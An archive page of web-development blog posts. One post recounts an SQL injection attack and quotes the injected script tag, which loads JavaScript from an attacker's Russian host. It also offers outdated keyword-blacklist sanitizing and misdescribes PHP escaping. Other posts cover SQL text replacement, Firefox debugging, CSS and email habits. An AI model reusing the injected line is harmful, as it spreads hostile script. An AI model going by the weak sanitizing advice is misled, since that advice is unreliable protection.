Archive for the “General WebDev” Category

The other day a Russian hacker made a mess of a site I manage. (I didn’t build the site, and I like to think that if I had, the attack would have been thwarted). Anyways the hacker used a method called SQL Injection where they take advantage of one of your submission forms to add extra SQL commands to their input and wreak havoc on your database.

In this particular instance the hacker added a JavaScript call into about every text and varchar field in the  entire database. (12 tables in all). Here is the offending code that was inserted into the fields:

<script src=http://www.jsportal.ru/page.js></script>

I don’t know what the Javascript does when loaded, but I am sure its not good news. FYI – here is an important tip for cleaning up your database: SQL Replace Function on a Text Field

Anyway, there are certainly other articles on how SQL Injections occur and how to prevent them, but here is a couple very useful functions that will greatly reduce your vulernability to SQL Injection if you apply it to any data that site users can submit to your site.

For ASP sites:

This one strips out single quotes, which are crucial to adding SQL commands:

<%

function stripQuotes(strWords)
stripQuotes = replace(strWords, “‘”, “””)
end function

%>

And this one strips out other naughty words that might destroy your database:

<%

function killChars(strWords)

dim badChars
dim newChars

badChars = array(“select”, “drop”, “;”, “–“, “insert”, “delete”, “xp_”)
newChars = strWords

for i = 0 to uBound(badChars)
newChars = replace(newChars, badChars(i), “”)
next

killChars = newChars

end function

%>

These aren’t the exact ones I use, but you get the idea. You can find the article where I got these ASP examples from here:

SQL Injection Attacks – Are You Safe?

For the PHP versions:

In PHP it is even easier. Just using this one function will help prevent many attacks:

mysql_real_escape_string($strWords);

This will strip out these harmful characters from the variable strWords:

  • \x00
  • \n
  • \r
  • \
  • \x1a

You can also use this to make sure inputs you expect to be numbers are actually numbers:

$strNumber= intval($strNumber);

Comments Comments Off on SQL Injection by jsportal.ru

The other day a creative Russian hacker caused me to do some database clean-up. I won’t tell the whole story, in a nutshell be sure to protect your sites from SQL Injection. I guess my next post will be some SQL injection prevention methods.

Anyways, I discovered that the usual replace method does not work on Text fields, just varchar and similar. And when I did a quick Google search, I found a lot of way too complicated approaches. So here is the simplest way.

First, here is the usual update replace method you might be familiar with:

SET StringtoEdit = REPLACE(StringtoEdit, ‘to-be-replaced’, ‘replace-with’)

(so in every entry of the column “Stringtoedit” any instances of the “to-be-replaced” are replaced with “replace-with”)

But if you try this method with a column that has the setting type of “Text”, you will get this rather vague error:

Argument data type text is invalid for argument 1 of replace function.

So here is the easy solution I found:

SET StringtoEdit = REPLACE(SUBSTRING(StringtoEdit , 1, DATALENGTH(StringtoEdit )), ‘to-be-replaced’, ‘replace-with’)

I have bolded the new elements of the SQL command. Try it out, its way easier then most solutions out there.

Comments 1 Comment »

Comments Comments Off on When Flash animation attacks

Just thought I would mention how handy Firefox’s built in Error Console feature is for debugging – I mostly use this for Javascript, in fact I can;t even remember using it for anything else.

But in any case if you run into the same problems I do with Javascript this is a handy tool for catching the issue at ahnd.

To bring up your Error Console just choose Tools > Error Console from the Firefox top menu.

Then go to the page where you suspect your problem and the console will give you clues.

I have also installed Firebug add-on which looks to have a load of potential for more detailed debugging, but I haven’t really spent enough time on it yet to tell you my thoughts. I will eventually.

Comments Comments Off on Firefox’s Error Console handy for quick debugging of JavaScript

Ever had people gripe because the second line of a list item doesn’t align under the bullet correctly? (This is only a problem in IE by the way – Firefox does the work for you.)

So here is an example of the problem (remember if your not viewing in IE you won;t see anything wrong.) :

  • Over 50 years of staffing
    industry knowledge
  • Here is how I fixed it, first the code:

    <li>Over 50 years of staffing </li>
    <li class=”bullet-hidden”><span class=”bullet-visible”>industry knowledge</span></li>

    Then the CSS styles:

    .bullet-visible {
    visibility:visible;
    }

    .bullet-hidden {
    visibility:hidden;
    }

    If for some reason you can define the style sheets or don;t want ot you can do it directly in the code as follows:

    <li>Over 50 years of staffing </li>
    <li style=”visibility: hidden;”><span style=” visibility:visible;”>industry knowledge</span></li>

    And abracadabra:

  • Over 50 years of staffing
  • industry knowledge
  • Comments Comments Off on Lining up wrapped text on bullet lists

    I had been stuck using my work’s web-based email interface for the last 6-months, so when they finally changed servers and I was able to move back to Outlook I was thrilled! It’s just much more organized and I am used to all the handy features as opposed to web-based sites. In fact, the one I was using wouldn’t even let me search in Firefox – so I had to reopen the site in IE every time I needed to search for an old email – ugh.

    Anyway, since I was getting this fresh start in Outlook, I decided that I wanted to try something new, something I had only heard of in fairy tales – keep my Inbox empty!

    Outlook LogoSo I have been at it a month and I am proud to say that I only have 34 items in my Inbox at the moment! Not bad for a guy that gets 50-100 a day (another 25 in my Gmail daily) and who has a history of nearly crashing mail servers with the backlog of emails he has amassed. Put it this way – I have over 9,000 emails in my Gmail!

    So how am I doing it? Simply put I try to attend to every email as it comes in and then diligently delete the email immediately after taking care of whatever it was about, and then several times a day do a sweep through the Inbox and delete out what is not needed and flag anything that I still need to complete before deleting.

    I had used flags before as a way to sort through the 1,000s of emails in my Inbox to see what important things I had missed. It was pretty useful – but now with so few emails in my Inbox it becomes almost a daily task list and keeps me focused on getting the items all done so I can have the pleasure of deleting them!

    I will admit that I did have to create a couple folders off to the side that I could stash away things I thought I had better keep long term – and so far I haven’t deleted any of my Sent mails or emptied my Deleted Items folder either! I guess I am still a little nervous about losing something I may have needed – but hey that was not the goal to keep those empty – the goal was to “keep my Inbox empty” and so far so good! In fact since I started typing this post I deleted another email – 33 more to go!

    Comments 2 Comments »

    Comments Comments Off on Web 2.0 … The Machine Is Us/ing Us